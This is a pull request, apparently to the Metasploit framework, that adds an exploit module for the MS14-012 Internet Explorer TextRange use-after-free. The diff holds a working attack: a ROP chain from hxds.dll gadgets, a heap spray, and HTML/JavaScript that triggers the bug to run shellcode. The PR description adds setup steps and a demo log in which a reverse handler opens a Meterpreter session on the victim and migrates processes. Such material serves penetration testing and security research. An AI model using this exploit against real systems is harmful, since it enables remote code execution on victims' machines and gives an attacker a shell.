### PR TITLE
Add MS14-012 Internet Explorer Use-After-Free Exploit Module

### DIFF
--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          #[ 'CVE', '' ], # Not really sure if it's CVE-2014-0306 or CVE-2014-0307, waiting for iDefense
+          [ 'CVE', '2014-0307' ],
           [ 'MSB', 'MS14-012' ]
         ],
       'Platform'       => 'win',

--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS14-012 Internet Explorer TextRange Use-After-Free",
+      'Description'    => %q{
+        This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw
+        was most likely introduced back in 2013, therefore only certain builds of MSHTML are
+        affected. In our testing with IE9, these vulnerable builds appear to be between
+        9.0.8112.16496 and 9.0.8112.16533, which implies Auguest 2013 until early March 2014
+        (before the patch).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jason Kratzer', # Original discovery
+          'sinn3r'         # Port
+        ],
+      'References'     =>
+        [
+          #[ 'CVE', '' ], # Not really sure if it's CVE-2014-0306 or CVE-2014-0307, waiting for iDefense
+          [ 'MSB', 'MS14-012' ]
+        ],
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script/i,
+          :os_name => OperatingSystems::WINDOWS,
+          :ua_name => HttpClients::IE,
+          :office  => "2010"
+          #:ua_ver  => '9.0' # Some fingerprinting issue w/ os_detect, disabled for now
+        },
+      'Targets'        =>
+        [
+          [
+            'Automatic',
+              {
+                # mov eax,dword ptr [edx+0C4h]; call eax
+                'Pivot' => 0x0c0d1020 # ECX
+              }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'       => "\x00",
+          'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500
+        },
+      'DefaultOptions'  =>
+        {
+          'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
+          'InitialAutoRunScript' => 'migrate -f'
+        },
+      'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
+      'DefaultTarget'  => 0))
+  end
+
+  # hxds.dll
+  def get_payload
+    setup =
+    [
+      0x51C3B376, # rop nop
+      0x51C2046E, # pop edi; ret
+      0x51BE4A41, # xchg eax, esp; ret
+    ].pack("V*")
+
+    # rop nops
+    45.times { setup << [0x51C3B376].pack('V*') }
+
+    setup << [
+      0x51C2046E, # pop edi ; ret
+      0x51BD28D4  # mov eax, [ecx], call [eax+8]
+    ].pack('V*')
+
+    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
+
+    Rex::Text.to_unescape(p)
+  end
+
+  def exploit_html
+    template = %Q|<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv='Cache-Control' content='no-cache'/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
+    <script>
+      <%=js_property_spray%>
+      sprayHeap({shellcode:unescape("<%=get_payload%>")});
+
+      function hxds() {
+        try {
+          location.href = 'ms-help:';
+        } catch(e) {}
+      }
+
+      function strike() {
+        hxds();
+        var fake = "";
+        for (var i = 0; i < 12; i++) {
+          if (i==0) { 
+             fake += unescape("<%=Rex::Text.to_unescape([target['Pivot']].pack('V*'))%>");
+          }
+          else {
+            fake += "\\u4141\\u4141";
+          }
+        }
+
+        var elements = [
+          'FOOTER', 'VIDEO', 'HTML', 'DIV', 'WBR', 'THEAD', 'PARAM', 'SECTION', 'IMG',
+          'TIME', 'ASISE', 'CANVAS', 'P', 'RT', 'FRAMESET', 'TRACK', 'CAPTION'
+        ];
+
+        for (var i = 0; i < elements.length; i++) {
+          var element = document.createElement(elements[i]);
+          document.body.appendChild(element);
+        }
+        
+        var tRange = document.body.createTextRange();
+        tRange.moveToElementText(document.body.children[16]);
+        tRange.execCommand('InsertInputSubmit', true, null);
+        tRange.moveToElementText(document.body.children[0]);
+        tRange.moveEnd('character',4);
+        tRange.execCommand('InsertOrderedList', true, null);
+        tRange.select();
+        tRange.moveToElementText(document.body.children[0]);
+        tRange.moveEnd('character',13);
+        tRange.execCommand('Underline', true, null);
+        tRange.execCommand('RemoveFormat', true, null);
+        var fillObject = document.createElement('button');
+        fillObject.className = fake;
+      }
+    </script>
+  </head>
+  <body onload='strike();'></body>
+</html>
+    |
+
+    return template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_exploit_html(cli, exploit_html)
+  end
+
+end


### PR DESCRIPTION
MS14-012 Internet Explorer Use-After-Free Exploit Module
### Verification

Since this vulnerability is only specific to certain builds of MSHTML, please make sure that your build is vulnerable. Normally if your build is between 9.0.8112.16496 and 9.0.8112.16533 then you probably have the right setup. Office 2010 is required for the hxds dll. Anyways, here are the steps:
- [x] Prepare a Windows 7 SP1 box (unpatched)
- [x] Make sure you're running IE9 (unpatched)
- [x] Make sure to disable your Windows updates ("Never check for updates")
- [x] Make sure you have Office 2010
- [ ] Go download the vulnerable patch for IE: http://technet.microsoft.com/en-us/security/bulletin/ms14-feb
- [ ] Run the module, get a shell

Demo:

```
$ msfconsole -q
msf > use exploit/windows/browser/ms14_012_textrange 
msf exploit(ms14_012_textrange) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/mNdLN4
[*]  Local IP: http://10.0.1.76:8080/mNdLN4
[*] Server started.
msf exploit(ms14_012_textrange) > [*] 10.0.1.89        ms14_012_textrange - Gathering target information.
[*] 10.0.1.89        ms14_012_textrange - Sending response HTML.
[*] Sending stage (769024 bytes) to 10.0.1.89
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.89:49932) at 2014-03-18 17:55:10 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.89:49932) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3440)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 588
[+] Successfully migrated to process 
```
